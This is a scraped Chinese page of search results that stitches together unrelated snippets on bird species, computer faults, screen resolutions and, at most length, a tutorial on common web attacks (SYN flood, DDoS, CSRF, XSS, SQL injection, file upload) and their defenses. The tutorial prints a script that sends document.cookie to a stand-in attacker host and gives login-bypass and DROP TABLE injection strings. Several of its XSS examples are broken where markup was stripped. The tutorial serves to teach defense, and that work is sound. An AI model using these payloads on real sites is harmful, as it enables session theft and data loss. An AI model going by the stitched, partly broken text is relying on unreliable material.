精华内容
下载资源
问答
  • 常见鸟类 我国鸟类常见种类及分布
    千次阅读
    2020-12-24 02:06:11

    常见鸟类

    我国鸟类常见种类及分布

    下面介绍我国东北常见鸟类,华北常见鸟类,南方常见鸟

    类,草原常见鸟类,农田常见鸟类,居民点常见鸟类,水域常见

    鸟类,南海诸岛常见鸟类。

    在我国东北针阔叶混交林地区,常见种类有斑翅山鹑

    (Perdi-x

    dauuricae)

    、黑啄木鸟

    (Dryocopus

    martius)

    、红交嘴雀

    (Lo-xia

    curvirostra)

    (Certhia

    familiaris)

    (Bom-bycilla

    japonica)

    、大山雀

    (Parus

    major)

    、煤山雀

    (Parus

    a-ter)

    、沼泽山雀

    (Parus

    palustris)

    等。

    到林缘沼泽地带度夏产卵的有天鹅

    (Cygmus

    cygmus)

    、鸳鸯

    (Aix galeri culata)

    、丹顶鹤

    (Grus

    japonensis)

    、鸿

    (Anser cygnoides)

    、豆雁

    (Anser fabalis)

    、灰雁

    (Anser anser)

    、绿

    头鸭

    (Anas

    platyrh ynchos)

    绿翅鸭

    (Anas crecca)

    等,

    其中天鹅、

    鸯和丹顶鹤是本地区的稀有鸟类。

    在华北落叶阔叶林地区,以雉科、鸦科较为常见,如雉鸡

    (Pha-sianus colchicus)

    、勺鸡

    (Pucrasia

    macrolopha)

    、石鸡

    (Aleclo

    ris graeca)

    、喜鹊

    (Pica pica)

    、灰喜鹊

    (Cyanopica cyana)

    、红嘴蓝鹊

    (Cissa

    erythrorhyncha)

    、红嘴山鸦

    (Pyrrhocorax pyrrhocorax)

    、小

    嘴乌鸦

    (corvus

    corone)

    、星鸦

    (Nucifraga

    caryocatactes)

    等。其它

    (Dicrurus

    macro-cercus)

    (Myiophoneus

    caeruleus)

    、北红尾鸲

    (Phoeni-curus auroreus)

    、黑

    枕黄鹂

    (Oriolus chinen sis)

    鹪鹩

    (Tro-glodytes

    troglodytes)

    灰眉

    岩鹀

    (Emberiza cia)

    、三道眉草鹀

    (Emberiza cioides)

    、黑枕绿啄木

    更多相关内容
  • web常见安全漏洞

    万次阅读 2018-09-08 10:04:25
    随着Web2.0、网络社交等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中,越来越多的应用都架设Web平台上。Web业务的迅速发展吸引了黑客们的强烈关注,接踵而至的就是Web...

    原文地址: https://www.cnblogs.com/yzycoder/p/5741507.html

    随着Web2.0、网络社交等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中,越来越多的应用都架设在Web平台上。Web业务的迅速发展吸引了黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这使得越来越多的用户关注应用层的安全问题,Web应用安全的关注度也逐渐升温。

    本文从目前比较常见攻击方式入手,对过去一些经典方式进行学习和总结,希望能让大家对Web的安全有更清晰的认识。在阅读本文之前,小伙伴们需要对HTTP和TCP协议、SQL数据库、JavaScript有所了解哦。
    废话不多说,下面开始我们的Web安全之旅吧!
    DoS和DDoS攻击
    DoS(Denial of Service),即拒绝服务,造成远程服务器拒绝服务的行为被称为DoS攻击。其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。
    为了进一步认识DoS攻击,下面举个简单的栗子来进行说明:

    图1 TCP三次握手:数据段互换

    Client发送连接请求报文,Server接受连接后回复ACK报文,并为这次连接分配资源。Client接收到ACK报文后也向Server发送ACK报文,并分配资源,这样TCP连接就建立了。前两次握手,是为了保证服务端能收接受到客户端的信息并能做出正确的应答;后两次握手,是为了保证客户端能够接收到服务端的信息并能做出正确的应答。建立完TCP三次握手后,Client就可以和Web服务器进行通信了。
    在DoS攻击中,攻击者通过伪造ACK数据包,希望Server重传某些数据包,Server根据TCP重转机制,进行数据重传。攻击者利用TCP协议缺陷,通过发送大量的半连接请求,耗费CPU和内存资源。实现方式如下图:

    图2 攻击者伪造ACK数据包,发送大量的半连接请求

    Web服务器在未收到客户端的确认包时,会重发请求包一直到链接超时,才将此条目从未连接队列删除。攻击者再配合IP欺骗,SYN攻击会达到很好的效果。通常攻击者在短时间内伪造大量不存在的IP地址,向服务器不断地发送SYN包,服务器回复确认包,并等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造的SYN包将长时间占用未连接队列,正常的SYN 请求被丢弃,目标系统运行缓慢,严重者引起网络堵塞甚至系统瘫痪。
    SYN攻击的问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的,从而导致第三次握手无法完成。在这种情况下服务器端一般会重试,即再次发送SYN+ACK给客户端,并等待一段时间后丢弃这个未完成的连接。这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级,大约为30秒到2分钟。一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源,即数以万计的半连接,将会对服务器的CPU和内存造成极大的消耗。若服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃。实际上,就算服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求,导致用户的正常请求失去响应。
    对于该类问题,我们可以做如下防范:
    第一种是缩短SYN Timeout时间,及时将超时请求丢弃,释放被占用CPU和内存资源。
    第二种是限制同时打开的SYN半连接数目,关闭不必要的服务。
    第三种方法是设置SYN Cookie,给每一个请求连接的IP地址分配一个Cookie。如果短时间内连续受到某个IP的重复SYN报文,就认定是受到了攻击,以后从这个IP地址来的包会被一概丢弃。
    一般来说,第三种方法在防范该类问题上表现更佳。同时可以在Web服务器端采用分布式组网、负载均衡、提升系统容量等可靠性措施,增强总体服务能力。
    DDoS(Distributed Denial of Service,分布式拒绝服务)是DoS攻击的一种方法。攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的。DDoS的攻击策略侧重于通过很多“僵尸主机”,向受害主机发送大量看似合法的网络包,从而造成网络阻塞或服务器资源耗尽而导致拒绝服务。

    图3 DDoS攻击创建“僵尸主机”的过程

    从上图可知,DDOS是利用一批受控制的僵尸主机向一台服务器主机发起的攻击,其攻击的强度和造成的威胁要比DOS严重很多,更具破坏性。
    对于DDoS攻击,我们可以做如下防范:
    (1) 反欺骗:对数据包的地址及端口的正确性进行验证,同时进行反向探测。
    (2) 协议栈行为模式分析:每个数据包类型需要符合RFC规定,这就好像每个数据包都要有完整规范的着装,只要不符合规范,就自动识别并将其过滤掉。
    (3) 特定应用防护:非法流量总是有一些特定特征的,这就好比即便你混进了顾客群中,但你的行为还是会暴露出你的动机,比如老重复问店员同一个问题,老做同样的动作,这样你仍然还是会被发现的。
    (4) 带宽控制:真实的访问数据过大时,可以限制其最大输出的流量,以减少下游网络系统的压力。
    CSRF攻击CSRF(Cross Site Request Forgery),即跨站请求伪造,是一种常见的Web攻击,但很多开发者对它很陌生。CSRF也是Web安全中最容易被忽略的一种攻击。下面先介绍一下CSRF攻击的原理。

    图4 CSRF攻击过程的示例图

    受害者用户登录网站A,输入个人信息,在本地保存服务器生成的cookie。攻击者构建一条恶意链接,例如对受害者在网站A的信息及状态进行操作,典型的例子就是转账。受害者打开了攻击者构建的网页B,浏览器发出该恶意连接的请求,浏览器发起会话的过程中发送本地保存的cookie到网址A,A网站收到cookie,以为此链接是受害者发出的操作,导致受害者的身份被盗用,完成攻击者恶意的目的。
    举个简单的例子来说明下CSRF的危害。用户登陆某银行网站,以Get请求的方式完成到另一银行的转账,如:http://www.mybank.com/Transfer.php?toBankId=11&money=1000。攻击者可构造另一危险链接http://www.mybank.com/Transfer.php?toUserId=100&money=1000并把该链接通过一定方式发给受害者用户。受害者用户若在浏览器打开此链接,会将之前登陆后的cookie信息一起发送给银行网站,服务器在接收到该请求后,确认cookie信息无误,会完成改请求操作,造成攻击行为完成。攻击者可以构造CGI的每一个参数,伪造请求。这也是存在CSRF漏洞的最本质原因。
    对于CSRF攻击,我们可以做如下防范:
    (1) 验证码。应用程序和用户进行交互过程中,特别是账户交易这种核心步骤,强制用户输入验证码,才能完成最终请求。在通常情况下,验证码够很好地遏制CSRF攻击。
    但增加验证码降低了用户的体验,网站不能给所有的操作都加上验证码。所以只能将验证码作为一种辅助手段,在关键业务点设置验证码。
    (2) Referer Check。HTTP Referer是header的一部分,当浏览器向web服务器发送请求时,一般会带上Referer信息告诉服务器是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。可以通过检查请求的来源来防御CSRF攻击。正常请求的referer具有一定规律,如在提交表单的referer必定是在该页面发起的请求。所以通过检查http包头referer的值是不是这个页面,来判断是不是CSRF攻击。
    但在某些情况下如从https跳转到http,浏览器处于安全考虑,不会发送referer,服务器就无法进行check了。若与该网站同域的其他网站有XSS漏洞,那么攻击者可以在其他网站注入恶意脚本,受害者进入了此类同域的网址,也会遭受攻击。出于以上原因,无法完全依赖Referer Check作为防御CSRF的主要手段。但是可以通过Referer Check来监控CSRF攻击的发生。
    (3) Anti CSRF Token。目前比较完善的解决方案是加入Anti-CSRF-Token,即发送请求时在HTTP 请求中以参数的形式加入一个随机产生的token,并在服务器建立一个拦截器来验证这个token。服务器读取浏览器当前域cookie中这个token值,会进行校验该请求当中的token和cookie当中的token值是否都存在且相等,才认为这是合法的请求。否则认为这次请求是违法的,拒绝该次服务。
    这种方法相比Referer检查要安全很多,token可以在用户登陆后产生并放于session或cookie中,然后在每次请求时服务器把token从session或cookie中拿出,与本次请求中的token 进行比对。由于token的存在,攻击者无法再构造出一个完整的URL实施CSRF攻击。但在处理多个页面共存问题时,当某个页面消耗掉token后,其他页面的表单保存的还是被消耗掉的那个token,其他页面的表单提交时会出现token错误。
    XSS攻击
    XSS(Cross Site Scripting),跨站脚本攻击。为和层叠样式表(Cascading Style Sheets,CSS)区分开,跨站脚本在安全领域叫做“XSS”。恶意攻击者往Web页面里注入恶意Script代码,当用户浏览这些网页时,就会执行其中的恶意代码,可对用户进行盗取cookie信息、会话劫持等各种攻击。XSS是常见的Web攻击技术之一,由于跨站脚本漏洞易于出现且利用成本低,所以被OWASP列为当前的头号Web安全威胁。

    图5 XSS攻击过程的示例图

    XSS跨站脚本攻击本身对Web服务器没有直接的危害,它借助网站进行传播,使网站上大量用户受到攻击。攻击者一般通过留言、电子邮件或其他途径向受害者发送一个精心构造的恶意URL,当受害者在Web中打开该URL的时候,恶意脚本会在受害者的计算机上悄悄执行。
    根据XSS攻击的效果,可以将XSS分为3类:
    (1) 反射型XSS(Non-persistent XSS),服务器接受客户端的请求包,不会存储请求包的内容,只是简单的把用户输入的数据“反射”给浏览器。例如:www.a.com?xss.php?name=

    。访问这个链接则会弹出页面的cookie内容,若攻击者把alert改为一个精心构造的发送函数,就可以把用户的cookie偷走。 (2) 存储型XSS(Persistent XSS),这类XSS攻击会把用户输入的数据“存储”在服务器端,具有很强的稳定性。注入脚本跟反射型XSS大同小异,只是脚本不是通过浏览器à服务器à浏览器这样的反射方式,而是多发生在富文本编辑器、日志、留言、配置系统等数据库保存用户输入内容的业务场景。即用户的注入脚本保存到了数据库里,其他用户进行访问涉及到包含恶意脚本的链接都会中招。由于这段恶意的脚本被上传保存到了服务器,这种XSS攻击就叫做“存储型XSS”。例如: 服务器端代码:
    <?php $db.set(‘name’, $_GET[‘name’]);?>

    HTML页面代码

    <?php echo ‘Hi,’ . $db.get[‘name’];?>

    图6 存储型XSS攻击过程的示例图

    (3) DOM based XSS(Document Object Model XSS),这类XSS攻击者将攻击脚本注入到DOM 结构里。出现该类攻击的大多原因是含JavaScrip静态HTML页面存在XSS漏洞。例如下面是一段存在DOM类型跨站脚本漏洞的代码:

    在JS中window.location.search是指URL中?之后的内容,document.write是将内容输出到页面。这时把链接换成http://localhost/test.php?default=
    那用户的cookie就被盗了。上面的例子只是很简单的一种,总结起来是使用了诸如document.write, innerHTML之类的渲染页面方法需要注意参数内容是否是可信任的。
    XSS攻击的危害,可以将XSS分为3类:
    (1) 窃取用户信息。黑客可以利用跨站脚本漏洞盗取用户cookie而得到用户在该站点的身份权限。如在DOM树上新增图片,用户点击后会将当前cookie发送到黑客服务器:
    vari=document.createElement(“img”);
    document.body.appendChild(i);
    i.src = “http://www.hackerserver.com/?c=” + document.cookie;
    (2) 劫持浏览器会话来执行恶意操作,如进行非法转账、强制发表日志或电子邮件等。
    (3) 强制弹广告页,刷流量和点击率。
    (4) 传播跨站脚本蠕虫。如著名的Samy (XSS)蠕虫攻击、新浪微博蠕虫攻击。
    对于XSS攻击,我们可以做如下防范:
    (1) 输入过滤。永远不要相信用户的输入,对用户输入的数据做一定的过滤。如输入的数据是否符合预期的格式,比如日期格式,Email格式,电话号码格式等等。这样可以初步对XSS漏洞进行防御。
    上面的措施只在web端做了限制,攻击者通抓包工具如Fiddler还是可以绕过前端输入的限制,修改请求注入攻击脚本。因此,后台服务器需要在接收到用户输入的数据后,对特殊危险字符进行过滤或者转义处理,然后再存储到数据库中。
    (2) 输出编码。服务器端输出到浏览器的数据,可以使用系统的安全函数来进行编码或转义来防范XSS攻击。在PHP中,有htmlentities()和htmlspecialchars()两个函数可以满足安全要求。相应的JavaScript的编码方式可以使用JavascriptEncode。
    (3) 安全编码。开发需尽量避免Web客户端文档重写、重定向或其他敏感操作,同时要避免使用客户端数据,这些操作需尽量在服务器端使用动态页面来实现。
    (4) HttpOnly Cookie。预防XSS攻击窃取用户cookie最有效的防御手段。Web应用程序在设置cookie时,将其属性设为HttpOnly,就可以避免该网页的cookie被客户端恶意JavaScript窃取,保护用户cookie信息。
    (5)WAF(Web Application Firewall),Web应用防火墙,主要的功能是防范诸如网页木马、XSS以及CSRF等常见的Web漏洞攻击。由第三方公司开发,在企业环境中深受欢迎。
    SQL注入攻击
    SQL注入(SQL Injection),应用程序在向后台数据库传递SQL(Structured Query Language,结构化查询语言)时,攻击者将SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
    在了解SQL注入前,我们先认识下常用的Web的四层架构图组成:

    图7 Web四层架构示例图

    SQL注入常见产生的原因有:
    (1) 转义字符处理不当。特别是输入验证和单引号处理不当。用户简单的在url页面输入一个单引号,就能快速识别Web站点是否易收到SQL注入攻击。
    (2) 后台查询语句处理不当。开发者完全信赖用户的输入,未对输入的字段进行判断和过滤处理,直接调用用户输入字段访问数据库。(3) SQL语句被拼接。攻击者构造精心设计拼接过的SQL语句,来达到恶意的目的。如构造语句:select * from users where userid=123; DROP TABLE users;直接导致user表被删除。
    SQL注入常见的注入方式有:
    (1) 内联SQL注入。向查询注入一些SQL代码后,原来的查询仍然会全部执行。内联SQL注入包含字符串内联SQL注入和数字内联SQL注入。注入方式如下图:

    图8 内联SQL注入示例图

    攻击者将精心构造的字符串或数字输入插入到SQL语句中,例如如下的用户登陆页面:

    图9 有SQL注入风险的用户登陆示例图

    (a) 攻击者可在username字段中注入 ’ or ‘1’=’1’ or ‘1’=’1,password保持为空:
    SELECT * FROM login_tbl WHERE username = ’ ’ or ‘1’=’1’ or ‘1’=’1’ AND userpwd= ’ ’
    这样SQL语句查询语句恒为真,服务器会返回login_tbl表里的全部账户名和密码。
    (b) 攻击者可在password字段,输入’ or ‘1’=’1:
    SELECT * FROM login_tbl WHERE username = ’ ’ AND userpwd= ’ ’ or ‘1’=’1 ’
    这样SQL语句查询语句恒为真,服务器会返回login_tbl表里的全部账户名和密码。
    (c) 攻击者可在username字段中注入 admin’ and 1=1 or ‘1’=’1:
    SELECT * FROM login_tbl WHERE username = ‘admin’ and ‘1’=’1’ or ‘1’=’1’ AND userpwd= ’ ’
    这样构造的SQL语句,服务器会返回admin用户登陆。
    常见的字符串内联注入的特征值如下:

    图10 字符串内联注入的特征值

    常见的数字值内联注入的特征值如下:

    图11 数字值内联注入的特征值

    (2) 终止式SQL注入。攻击者在注入SQL代码时,通过注释剩下的查询来成功结束该语句。注入方式如下图:

    图12 终止式SQL注入示例图

    攻击者将精心构造的字符串或数字输入插入到SQL语句中,例如图9的用户登陆页面:
    (a) 攻击者可在username字段中注入 ’ or 1=1; –,password保持为空:
    SELECT username, userpwd FROM login_tbl WHERE username=” or 1=1; – ’ and userpwd=”
    这样SQL语句查询语句恒为真,服务器会返回login_tbl表里的全部账户名和密码。
    (b) 攻击者可在username字段中注入 admin’ –,或者admin’ #,password保持为空:
    SELECT username, userpwd FROM login_tbl WHERE username=’admin’ –’ and userpwd=”
    SELECT username, userpwd FROM login_tbl WHERE username=’admin’ #’ and userpwd=”
    这样构造的SQL语句,服务器会返回admin用户登陆。
    (c) 攻击者可在username字段中注入 admin’ /,password输入/’:
    SELECT username, userpwd FROM login_tbl WHERE username=’admin’ /’ and userpwd=’/”
    这样构造的SQL语句,服务器会返回admin用户登陆。
    常见的终止式SQL注入的特征值如下:

    图13 终止式SQL注入的特征值

    对于SQL注入攻击,我们可以做如下防范:
    (1) 防止系统敏感信息泄露。设置php.ini选项display_errors=off,防止php脚本出错之后,在web页面输出敏感信息错误,让攻击者有机可乘。
    (2) 数据转义。设置php.ini选项magic_quotes_gpc=on,它会将提交的变量中所有的’(单引号),”(双引号),(反斜杠),空白字符等都在前面自动加上\。或者采用mysql_real_escape()函数或addslashes()函数进行输入参数的转义。
    (3) 增加黑名单或者白名单验证。白名单验证一般指,检查用户输入是否是符合预期的类型、长度、数值范围或者其他格式标准。黑名单验证是指,若在用户输入中,包含明显的恶意内容则拒绝该条用户请求。在使用白名单验证时,一般会配合黑名单验证。
    文件上传漏洞
    上传漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。该漏洞允许用户上传任意文件可能会让攻击者注入危险内容或恶意代码,并在服务器上运行。
    文件上传漏洞的原理:由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP文件,并能够将这些文件传递给 PHP 解释器,就可以在远程服务器上执行任意PHP脚本。
    对于文件上传漏洞攻击,我们可以做如下防范:
    (1)检查服务器是否判断了上传文件类型及后缀。
    (2) 定义上传文件类型白名单,即只允许白名单里面类型的文件上传。
    (3) 文件上传目录禁止执行脚本解析,避免攻击者进行二次攻击。
    Info漏洞
    Info漏洞就是CGI把输入的参数原样输出到页面,攻击者通过修改输入参数而达到欺骗用户的目的。

    Info漏洞存在的3个主要原因有:
    1)CGI参数可以在页面显示。
    2)返回的页面具有很强的欺骗性。
    3)该页面是对所有用户是公开,可访问的。
    Info漏洞的主要危害在于,若在访问量较大的公开页面,如网购、微博或新闻网站,发布反动的政治言论或其他色情词汇等。一方面会影响用户对网购业务的信心,同时也会给网站带来一些政治风险。另外,若是发布欺骗信息,如中奖、彩票等,也会对一些用户造成财产损失。
    对于Info漏洞攻击,将为常见的就是建立脏词库。
    即对于晒单,评论,昵称等可以被其他用户访问到的地方,进行脏词过滤。对用户的输入词汇,与脏词库中的词汇进行匹配,过滤掉有与脏词库相同的词汇。对于一些面向用户自己的,而其他用户不能看到的页面。可以不对其做脏词处理。
    介绍就到这里啦,我们一起来做个总结吧:Web安全是我们必须关注且无法逃避的话题,本文介绍了一些比较典型的安全问题和应对方案。例如对于SQL,XSS等注入式攻击,我们一定要对用户输入的内容进行严格的过滤和审查,这样可以避免绝大多数的注入式攻击方式。对于DoS攻击我们就需要使用各种工具和配置来减轻危害,另外容易被DDoS攻击的还有HTTPS服务,我们要做好特定的应用防护和用户行为模式分析。所以在日常的开发和测试过程中,我们要时常提醒自己,写出的代码有没有可能被人攻击?或者思考若我是一个攻击者,我该怎么做才可以达到我的攻击效果呢?只有这样知己知彼后,方可百战百胜!

    展开全文
  • 六大常见的电脑故障原因

    千次阅读 2021-07-27 10:17:20
    六大常见的电脑故障原因导语:电脑故障的原因有很多种,今天小编就为大家整理了常见的六...这种故障大都出现连接电缆或IDE端口上,硬盘本身故障的可能性不大,可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替...

    六大常见的电脑故障原因

    导语:电脑故障的原因有很多种,今天小编就为大家整理了常见的六大故障原因!欢迎阅读,仅供参考,更多相关的知识,请关注CNFLA学习网的栏目!

    7746b9edf115c2fbb03df09296bbea9f.png

    常见故障一:系统不认硬盘

    系统从硬盘无法启动,从A盘启动也无法进入C盘,使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上,硬盘本身故障的可能性不大,可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验,就会很快发现故障的所在。如果新接上的硬盘也不被接受,一个常见的原因就是硬盘上的主从跳线,如果一条IDE硬盘线上接两个硬盘设备,就要分清楚主从关系。

    常见故障二:硬盘无法读写或不能辨认

    这种故障一般是由于CMOS设置故障引起的。CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能,可自动检测硬盘的类型。当硬盘类型错误时,有时干脆无法启动系统,有时能够启动,但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量,则硬盘后面的扇区将无法读写,如果是多分区状态则个别分区将丢失。还有一个重要的故障原因,由于目前的IDE都支持逻辑参数类型,硬盘可采用

    “Normal,LBA,Large”等,如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式,则会发生硬盘的读写错误故障,因为其映射关系已经改变,将无法读取原来的正确硬盘位置。

    常见故障三:系统无法启动

    造成这种故障通常是基于以下四种原因:

    1. 主引导程序损坏

    2. 分区表损坏

    3. 分区有效位错误

    4. DOS引导文件损坏

    其中,DOS引导文件损坏最简单,用启动盘引导后,向系统传输一个引导文件就可以了。主引导程序损坏和分区有效位损坏一般也可以用FDISK /MBR强制覆写解决。分区表损坏就比较麻烦了,因为无法识别分区,系统会把硬盘作为一个未分区的裸盘处理,因此造成一些软件无法工作。不过有个简单的方法——使用Windows 2000。找个装有Windows 2000的系统,把受损的硬盘挂上去,开机后,由于Windows 2000为了保证系统硬件

    的稳定性会对新接上去的硬盘进行扫描。Windows 2000的硬盘扫描程序CHKDSK对于因各种原因损坏的硬盘都

    有很好的修复能力,扫描完了基本上也修复了硬盘。

    分区表损坏还有一种形式,这里我姑且称之为“分区映射”,具体的表现是出现一个和活动分区一样的分区。一样包括文件结构,内容,分区容

    量。假如在任意区对分区内容作了变动,都会在另一处体现出来,好像是映射的影子一样。我曾遇上过,6.4G的硬盘变成8.4G(映射了2G的C区)。这种问题特别尴尬,这问题不影响使用,不修复的话也不会有事,但要修复时,NORTON的DISKDOCTOR和PQMAGIC却都变成了睁眼瞎,对分区总容量和硬盘实际大小不一致视而不见,满口没问题的敷衍你。对付这问题,只有GHOST覆盖和用NORTON的拯救盘恢复分区表。

    常见故障四:硬盘出现坏道

    这是个令人震惊,人见人怕的词。近来IBM口碑也因此江河日下。当你用系统Windows 系统自带的磁盘扫描程序SCANDISK扫描硬盘的时候,系统提示说硬盘可能有坏道,随后闪过一片恐怖的蓝色,一个个小黄方块慢慢的伸展开,然后,在某个方块上被标上一个“B”??

    其实,这些坏道大多是逻辑坏道,是可以修复的。根本用不着送修(据说厂商之所以开发自检工具就是因为受不了返修的硬盘中的一半根本就是

    好的这一“残酷的”事实)。

    那么,当出现这样的问题的时候,我们应该怎样处理呢?

    一旦用“SCANDISK”扫描硬盘时如果程序提示有了坏道,首先我们应该重新使用各品牌硬盘自己的自检程序进行完全扫描。注意,别选快速扫描,因为它只能查出大约90%的问题。为了让自己放心,在这多花些时间是值得的.。

    如果检查的结果是“成功修复”,那可以确定是逻辑坏道,可以拍拍胸脯喘口气了;假如不是,那就没有什么修复的可能了,如果你的硬盘还在

    保质期,那赶快那去更换吧。

    由于逻辑坏道只是将簇号作了标记,以后不再分配给文件使用。如果是逻辑坏道,只要将硬盘重新格式化就可以了。但为了防止格式化可能的丢

    弃现象(因为簇号上已经作了标记表明是坏簇,格式化程序可能没有检查就接受了这个“现实”,于是丢弃该簇),最好还是重分区,使用如IBM DM之类的软件还是相当快的,或者GHOST覆盖也可以,只是这两个方案都多多少少会损失些数据。

    常见故障五:硬盘容量与标称值明显不符

    一般来说,硬盘格式化后容量会小于标称值,但此差距绝不会超过20%,如果两者差距很大,则应该在开机时进入BIOS设置。在其中根据你的

    硬盘作合理设置。如果还不行,则说明可能是你的主板不支持大容量硬盘,此时可以尝试下载最新的主板BIOS并进行刷新来解决。此种故障多在大容量硬盘与较老的主板搭配时出现。另外,由于突然断电等原因使BIOS设置产生混乱也可能导致这种故障的发生。

    常见故障六:无论使用什么设备都不能正常引导系统

    这种故障一般是由于硬盘被病毒的“逻辑锁”锁住造成的,“硬盘逻辑锁”是一种很常见的恶作剧手段。中了逻辑锁之后,无论使用什么设备都

    不能正常引导系统,甚至是软盘、光驱、挂双硬盘都一样没有任何作用。

    “逻辑锁”的上锁原理:计算机在引导DOS系统时将会搜索所有逻辑盘的顺序,当DOS被引导时,首先要去找主引导扇区的分区表信息,然后查找各扩展分区的逻辑盘。“逻辑锁”修改了正常的主引导分区记录,将扩展分区的第一个逻辑盘指向自己,使得DOS在启动时查找到第一个逻辑盘后,查找下个逻辑盘总是找到自己,这样一来就形成了死循环。

    给“逻辑锁”解锁比较容易的方法是“热拔插”硬盘电源。就是在当系统启动时,先不给被锁的硬盘加

    电,启动完成后再给硬盘“热插”上电源线,这样系统就可以正常控制硬盘了。这是一种非常危险的方法,为了降低危险程度,碰到“逻辑锁”后,大家最好依照下面几种比较简单和安全的方法处理。

    1. 首先准备一张启动盘,然后在其他正常的机器上使用二进制编辑工具(推荐UltraEdit)修改软盘上的IO.SYS文件(修改前记住先将该文件

    的属性改为正常),具体是在这个文件里面搜索第一个“55AA”字符串,找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏,你无法用“Fdisk”来删除和修改分区,这时你可以用Diskman等软件恢复或重建分区即可。

    2. 因为DM是不依赖于主板BIOS来识别硬盘的硬盘工具,就算在主板BIOS中将硬盘设为“NONE”,DM也可识别硬盘并进行分区和格式化等操作,所以我们也可以利用DM软件为硬盘解锁。

    首先将DM拷到一张系统盘上,接上被锁硬盘后开机,按“Del”键进入BIOS设置,将所有IDE接口设为

    “NONE”并保存后退出,然后用软盘启动系统,系统即可“带锁”启动,因为此时系统根本就等于没有硬盘。启动后运行DM,你会发现DM可以识别

    出硬盘,选中该硬盘进行分区格式化就可以了。这种方法简单方便,但是有一个致命的缺点,就是硬盘上的数据保不住了

    【六大常见的电脑故障原因】相关文章:

    展开全文
  • 常见分辨率

    千次阅读 2019-02-15 16:09:00
    4:3格式的一些常见分辨率 • 640 X 480• 800 X 600• 960 X 720• 1024 X 768• 1152 X 864• 1280 X 960• 1400 X 1050• 1440 X 1080• 1600 X 1200• 1856 X 1392• 1920 X 1440• 2048 X 1536 4:3宽高比格式...

    4:3格式的一些常见分辨率

    • 640 X 480
    • 800 X 600
    • 960 X 720
    • 1024 X 768
    • 1152 X 864
    • 1280 X 960
    • 1400 X 1050
    • 1440 X 1080
    • 1600 X 1200
    • 1856 X 1392
    • 1920 X 1440
    • 2048 X 1536

    4:3宽高比格式的优点

    1、实用面积大。在相同尺寸的情况下,4:3格式比其他一些长形的比例格式的实用面积更大。

    2、适合普通电视。虽然现在的高清电视节目是以16:9格式的分辨率为主,但网络上传播的电视节目以及普通的电视、视频还是以4:3为主。

    4:3宽高比格式和16:9宽高比格式的区别

    4:3的宽高比格式和16:9的宽高比格式相比,4:3显示的影像偏正方形,而16:9显示的影像则偏长方形,视野更为宽阔。4:3称作普屏,适合看一些正常的电视节目。16:9称作宽屏,适合看一些高清电影,现在大部分高清影视都是16:9格式的显示比例。

    16:9比例分辨率常见的有:

    3840×2160 (超高清 4K)

    2560X1440 (2K)

    1920×1080 (1080p全高清)

    1600×900

    1366×768  

    1280×720    (720P 高清)

    1024×576

    多见的尺寸的16:10屏幕对应的最好分辨率(同样的尺寸,显示器不同最好分辨率也可能不同)

    19寸屏幕:1440x900(16:10)
    22寸屏幕:1680x1050(16:10)1920x1200(16:10)
    23寸屏幕:1920x1200(16:10)
    24寸屏幕:1920x1200(16:10)
    26寸屏幕:1920x1200(16:10)
    30寸屏幕:2560x1600(16:10)

    转载于:https://www.cnblogs.com/yuanqiangfei/p/10384203.html

    展开全文
  • 常见漏洞类型

    千次阅读 2020-09-30 10:52:07
    常见SRC漏洞类型 1. WEB漏洞 1.1. 反射型XSS 1.2. 存储型XSS 1.3. 命令注入 1.4. SQL注入 1.5. 上传漏洞 1.6. 信息泄露 1.7. CSRF 1.8. 文件包含 1.9. 逻辑漏洞 1.10. 权限绕过 1.11. URL跳转 1.12. XXE注入 1.13...
  • 常见应用层协议

    千次阅读 2019-10-03 11:54:24
    常见应用层协议 1、超文本传输协议 用于传输浏览器使用的普通文本、超文本、音频和视频等数据。 详细情况请看: 2、邮件协议 互联网中,电子邮件的传送是依靠这些协议完成的。 详细情况请看: 3、文件...
  • 接口测试常见问题

    万次阅读 2021-10-09 22:42:52
    接口测试常见问题 原文地址:接口测试常见问题 接口测试需要考虑的点/如何设计接口测试的用例? 接口测试用例编写除了使用功能测试中最基本的等价类,边界值,因果图,错误推测,场景设计等方法外,还要考虑一些...
  • web常见的攻击方式

    千次阅读 2022-04-18 09:39:00
